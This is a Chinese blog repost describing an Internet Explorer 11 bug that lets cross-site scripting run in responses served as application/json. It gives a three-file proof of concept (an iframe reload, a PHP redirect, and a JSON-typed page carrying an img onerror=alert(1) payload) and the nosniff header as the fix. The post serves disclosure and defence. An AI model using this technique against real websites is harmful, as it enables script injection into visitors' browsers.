内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

在application/json,application/javascript等Response下进行XSS

2016-12-23 14:09 出处:清屏网 人气: 评论(0

前不久在日本比较著名的XSS会议ShibuyaXSS上,著名漏洞猎人,Cure53成员Masato kinugawa

在会议上分享了个比较有趣的Internet Explorer的BUG。借助该BUG可以在application

/xx的response下优雅的完成XSS攻击。

POC.htm

<metacharset=utf-8>
<iframeid=x src=redirect.php></iframe>
<script>
x.location.reload();
</script>

redirect.php

<?php
header("location: json.php");
?>

json.php

<?php header("Content-Type: application/json"); ?>
<imgsrc=x onerror=alert(1)>

测试于Windows7/Internet Explorer 11

解决方案:

设置X-Content-Type-Options头 -> header(‘X-Content-Type-Options: nosniff’);


分享给小伙伴们:
本文标签: JSONXSS漏洞JavaScript

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号